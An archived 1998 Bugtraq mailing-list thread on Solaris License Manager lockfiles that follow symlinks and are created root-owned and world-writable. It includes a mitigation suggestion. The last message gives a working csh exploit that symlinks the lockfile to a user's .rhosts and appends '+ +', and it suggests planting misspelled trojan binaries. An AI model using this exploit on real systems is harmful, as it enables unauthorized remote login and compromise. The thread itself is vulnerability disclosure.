sol2.51-6.lockfiles.txt

1999-08-17T00:00:00
ID PACKETSTORM:15311
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Wed, 21 Oct 1998 20:22:38 +0200  
From: Joel Eriksson <na98jen@STUDENT.HIG.SE>  
To: BUGTRAQ@netspace.org  
Subject: License Manager's lockfiles (Solaris 2.5.1)  
  
License Manager on Solaris 2.5.1 tends to make stupid lockfiles owned by  
root and mode 666 (worldwrite'able). That is not good, since anyone could  
create rootowned files which they then would be able to modify. It's an  
even bigger problem since it just takes about a minute 'til the lockfile  
is created after it's replaced with a symlink which it follows ..  
  
Btw, if this is an old bug, I apologize. It's deadsimple so I would be  
surprised if it's not.. :-P Well, anyway..  
  
On the system I am on it looks like this:  
  
bash$ ls -l /var/tmp/lock*  
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI  
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd  
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta  
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd  
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd  
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd  
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd  
  
And:  
  
bash$ ls -l /var/tmp/.flexlm  
total 2  
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211  
  
I tested the bug by removing lockESRI and making a symlink to  
/var/tmp/test, in about a minute the file was created, owned by root and  
worldwrite'able.  
  
At first I didn't know where the bug was located but managed to find out  
by looking in the licenses_combined file that was passed as an option to  
the programs with the lockfiles. After some research I realised that the  
licenses_combined file was used by /opt/SUNWste/license_tools/lmgrd.ste  
that runs on the system I'm on.  
  
With strings I found the /usr/tmp/.flexlm (/usr/tmp is a symlink to  
/var/tmp) I have not tested to symlink lmgrd.211 (211 = lmgrd.ste's PID)  
but I guess it's exploitable to, if you can predict the PID (which  
probably isn't that hard when it's run from rc-scripts or similar on boot)  
  
There is also a frequent use of temporary files in the  
/opt/SUNWste/license_tools/config_template which also could be a  
securityrisk, at least if you can predict when the script is ran ..  
Raceconditions.  
  
/Joel Eriksson  
  
---------------------------------------------------------------------  
  
Date: Fri, 23 Oct 1998 14:56:07 -0700  
From: pedward@WEBCOM.COM  
To: BUGTRAQ@netspace.org  
Subject: Re: License Manager's lockfiles (Solaris 2.5.1)  
  
>  
> bash$ ls -l /var/tmp/.flexlm  
> total 2  
> -rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211  
>  
> I tested the bug by removing lockESRI and making a symlink to  
> /var/tmp/test, in about a minute the file was created, owned by root and  
> worldwrite'able.  
>  
  
Try creating a wrapper shell script that sets the umask before launching  
the license manager. If you set it properly, they won't be world writable  
(providing that the LM uses open(filename, O_EXCL | O_CREAT);  
  
This *sounds* like a simple misuse of the open syntax.  
  
>  
> /Joel Eriksson  
>  
  
--Perry  
  
--  
Perry Harrington System Software Engineer zelur xuniL ()  
http://www.webcom.com perry.harrington@webcom.com Think Blue. /\  
  
---------------------------------------------------------------------  
  
Date: Fri, 23 Oct 1998 20:22:03 -0400  
From: Roger Harrison ? <rharri01@KEPLER.POLY.EDU>  
To: BUGTRAQ@netspace.org  
Subject: Re: License Manager's lockfiles (Solaris 2.5.1)  
  
On Wed, 21 Oct 1998, Joel Eriksson wrote:  
  
> License Manager on Solaris 2.5.1 tends to make stupid lockfiles owned by  
> root and mode 666 (worldwrite'able). That is not good, since anyone could  
> create rootowned files which they then would be able to modify. It's an  
> even bigger problem since it just takes about a minute 'til the lockfile  
> is created after it's replaced with a symlink which it follows ..  
  
I discovered this a few months ago and neglected to post it.  
Solaris 2.6 is affected as well. A lock file locksuntechd is created  
in /tmp mode 666 owned by root and group root. I think the program is  
lmgrd FLEXlm v2.26d that is causing the problems, either that or suntechd.  
  
%ls -la /tmp/locksuntechd  
-rw-rw-rw- 1 root root 0 Oct 22 12:51 locksuntechd  
  
suntechd is in /opt/SUNWspro/SunTech_License/bin/  
  
there is a log file that contains some stuff about when the daemon is  
going up or down and also if users are exploiting it you can see entries  
about the lock file not being available. It is in  
/opt/SUNWspro/SunTech_License/license.log  
  
So to exploit it, just remove the locksuntechd file and replace it with a  
symlink to a file you want to create. It will not overwrite existing  
files from the testing that i did. Then the link is followed and the new  
file is created with mode 666 ownership root. You can then delete the  
symlink and create a new one to somewhere else and it will work again and  
again and again...what fun. Users could create .rhosts files, new system  
webpages, new trojan binaries with names spelled slightly off that get  
misspelled often (finger-fineger, pine-pien, ls-sl) come on.. tell me  
you never typed one of those out wrong while you were typing fast!  
  
------  
#!/bin/csh -f  
# Change target user name before running  
# Iconoclast@thepentagon.com 10/98  
rm /tmp/locksuntechd  
ln -s ~targetuser/.rhosts /tmp/locksuntechd  
exit  
------  
then wait a min and cat + + >> ~targetuser/.rhosts  
  
that's all for now...  
  
-Iconoclast  
iconoclast@thepentagon.com  
  
shout-outs to segv and timespace  
`